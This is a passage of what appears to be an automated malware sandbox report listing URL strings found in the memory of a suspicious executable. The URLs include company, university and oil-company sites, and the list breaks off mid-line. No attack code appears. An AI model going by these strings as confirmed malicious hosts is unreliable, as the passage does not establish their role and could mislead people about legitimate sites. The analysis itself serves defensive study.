                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abart.pl/%
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000142A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.804950474.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abdg.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abdg.com/O
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aevga.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aevga.com//b
                  Source: PIyT9A3jfC.exe, 00000001.00000002.894106313.0000000007715000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000142A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.804950474.000000000142A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.652259211.000000000143F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/%
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/O
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/aVX
                  Source: PIyT9A3jfC.exe, 00000001.00000002.894106313.0000000007715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/lu
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.asdoptics.com
                  Source: PIyT9A3jfC.exe, 00000001.00000002.891441514.0000000004C4D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.000000000137D000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/I
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.585974089.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588156336.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586890411.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586479452.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.587455999.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?gif
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.585974089.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588156336.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586890411.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586479452.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.587455999.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?today
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.585974089.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588156336.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586890411.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586479452.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.587455999.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?yes
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.585974089.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588156336.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586890411.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586479452.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.587455999.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/gallery.htm
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/images/cd/cdshop/cd_bright
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.585974089.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588156336.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586890411.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586479452.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.587455999.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/images/cd/cdshop/cd_bright%20fortune.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/m
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.basmedcol.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.bucea.edu.cn/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702274857.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.c9dd.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702274857.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.c9dd.com/-
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ccri.com.cn/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cel-cpa.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chd.com.cn/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cnpc.com.cn/cnpc/index.shtml
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cnpc.com.cn/cnpc/xhtml/images/logo.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.777742716.0000000007697000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cokocoko.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/&H
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, 